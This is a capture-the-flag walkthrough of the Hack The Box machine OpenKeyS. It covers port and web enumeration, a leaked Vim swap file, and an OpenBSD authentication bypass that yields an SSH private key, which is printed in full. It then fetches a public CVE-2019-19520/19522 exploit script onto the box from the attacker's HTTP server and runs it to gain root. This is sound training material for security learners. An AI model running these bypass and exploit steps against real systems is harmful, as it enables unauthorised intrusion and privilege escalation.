OpenKeyS Writeup
Introduction :
OpenKeyS is an Easy (but marked as Medium) OpenBSD box released back in July 2020.
Part 1 : Initial Enumeration
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -vvv -p- 10.10.10.199 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 22/tcp on 10.10.10.199
Discovered open port 80/tcp on 10.10.10.199
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -sCV -p22,80 10.10.10.199
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 21:12 CEST
Nmap scan report for 10.10.10.199
Host is up (0.47s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
| 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open http OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Part 2 : Getting User Access
Our nmap scan picked up port 80 which is a simple login page:
Let's enumerate the webservice using gobuster:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ gobuster dir -q -t 50 -u http://10.10.10.199 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt
/includes (Status: 301) [Size: 443] [--> http://10.10.10.199/includes/]
/js (Status: 301) [Size: 443] [--> http://10.10.10.199/js/]
/css (Status: 301) [Size: 443] [--> http://10.10.10.199/css/]
/images (Status: 301) [Size: 443] [--> http://10.10.10.199/images/]
/index.php (Status: 200) [Size: 4837]
/fonts (Status: 301) [Size: 443] [--> http://10.10.10.199/fonts/]
/. (Status: 200) [Size: 96]
We found the /includes directory so let's check it from our web browser:
Here we see that we have access to the auth.php.swp file:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/includes/auth.php.swp
--2021-06-26 21:20:14-- http://10.10.10.199/includes/auth.php.swp
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’
auth.php.swp [ <=> ] 12.00K 12.8KB/s in 0.9s
2021-06-26 21:20:16 (12.8 KB/s) - ‘auth.php.swp’ saved [12288]
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file auth.php.swp
auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat auth.php.swp
3210#! Utp=adniferopenkeys.htb/var/www/htdocs/includes/auth.php
@sWB@? mgC
v
p
n
m
U
S
0
J
?>} session_start(); session_destroy(); session_unset();{function close_session()} $_SESSION["username"] = $_REQUEST['username']; $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT']; $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR']; $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME']; $_SESSION["login_time"] = $_SERVER['REQUEST_TIME']; $_SESSION["logged_in"] = True;{function init_session()} } return False; { else } } return True; $_SESSION['last_activity'] = $time; // Session is active, update last activity time and return True { else } return False; close_session(); { ($time - $_SESSION['last_activity']) > $session_timeout) if (isset($_SESSION['last_activity']) && $time = $_SERVER['REQUEST_TIME']; // Has the session expired? { if(isset($_SESSION["logged_in"])) // Is the user logged in? session_start(); // Start the session $session_timeout = 300; // Session timeout in seconds{function is_active_session()} return $retcode; system($cmd, $retcode); $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);{function authenticate($username, $password)<****?php%
So once we download the .swp file we know that this was used by the user jennifer on openkeys.htb (we add it to our hosts file) and that there was a link to ../auth_helpers/check_auth so we download it after adding openkeys.htb to our hosts file:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.199 openkeys.htb' >> /etc/hosts
┌──(root💀nowhere)-[~]
└─# ping -c1 openkeys.htb
PING openkeys.htb (10.10.10.199) 56(84) bytes of data.
64 bytes from openkeys.htb (10.10.10.199): icmp_seq=1 ttl=254 time=470 ms
--- openkeys.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 469.674/469.674/469.674/0.000 ms
┌──(root💀nowhere)-[~]
└─# exit
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/auth_helpers/check_auth
--2021-06-26 21:23:30-- http://10.10.10.199/auth_helpers/check_auth
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12288 (12K) [application/octet-stream]
Saving to: ‘check_auth’
check_auth 100%[======================================================================================================================================================>] 12.00K 12.8KB/s in 0.9s
2021-06-26 21:23:32 (12.8 KB/s) - ‘check_auth’ saved [12288/12288]
We check what kind of file check_auth is:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file check_auth
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ rabin2 -I check_auth
arch x86
baddr 0x0
binsz 10495
bintype elf
bits 64
canary false
retguard false
class ELF64
compiler Linker: LLD 8.0.1
crypto false
endian little
havecode true
intrp /usr/libexec/ld.so
laddr 0x0
lang c
linenum true
lsyms true
machine AMD x86-64 architecture
maxopsz 16
minopsz 1
nx true
os openbsd
pcalign 0
pic true
relocs true
relro partial
rpath NONE
sanitiz false
static false
stripped false
subsys openbsd
va true
So here we see a hint towards /usr/libexec/ld.so and after a bit of googling we would stumble upon an authentication bypass using -schallenge as the password inside the cookie, so intercept the POST request to the index.php login page we found earlier using burpsuite:
Obviously if we send it as it is we get an authentication denied error:
So let's try the authentication bypass by going through the PHP cookie we mentionned earlier:
We follow the redirection:
And we get a SSH key! Now let's save it locally and use it to login as jennifer:
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat pkey
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ chmod 600 pkey
[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ ssh -i pkey jennifer@openkeys.htb
The authenticity of host 'openkeys.htb (10.10.10.199)' can't be established.
ECDSA key fingerprint is SHA256:gzhq4BokiWZ1NNWrblA8w3hLOhlhoRy+NFyi2smBZOA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'openkeys.htb,10.10.10.199' (ECDSA) to the list of known hosts.
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ ls
user.txt
openkeys$ cat user.txt
36XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to login via SSH as the user jennifer and get the user flag.
Part 3 : Getting Root Access
Now in order to privesc this box let's first enumerate it using linpeas.sh:
[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ cp /home/nothing/HTB/Admirer/linpeas.sh .
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[terminal 2]
openkeys$ curl http://10.10.14.11:9090/linpeas.sh > /tmp/peas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 333k 100 333k 0 0 66009 0 0:00:05 0:00:05 --:--:-- 80533
openkeys$ chmod +x /tmp/peas.sh
openkeys$ /tmp/peas.sh
` 
Let linpeas.sh run a bit and scrolling through the output we stumble upon xlock. So that's the hint to lookup for xlock privesc vulnerabilities, and we stumble upon CVE-2019-19520. So we upload the privesc script onto the box:
[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/openkeys]
→ wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot -O exploit.sh
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[terminal 2]
openkeys$ curl http://10.10.14.11:9090/exploit.sh > exploit.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4087 100 4087 0 0 4315 0 --:--:-- --:--:-- --:--:-- 4311
openkeys$ file exploit.sh
exploit.sh: Bourne shell script text executable
openkeys$ chmod +x exploit.sh
openkeys$ ./exploit.sh
openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
[*] checking system ...
[*] system supports S/Key authentication
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] compiling ...
[*] running Xvfb ...
[*] testing for CVE-2019-19520 ...
_XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created.
[+] success! we have auth group permissions
WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).
[*] trying CVE-2019-19522 (S/Key) ...
Your password is: EGG LARD GROW HOG DRAG LAIN
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
openkeys# cat /root/root.txt
f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to privesc to the root user and print the root flag.
Conclusion
Here we can see the progress graph :
Nihilist
Donate XMR to Nihilist:
8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o
7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8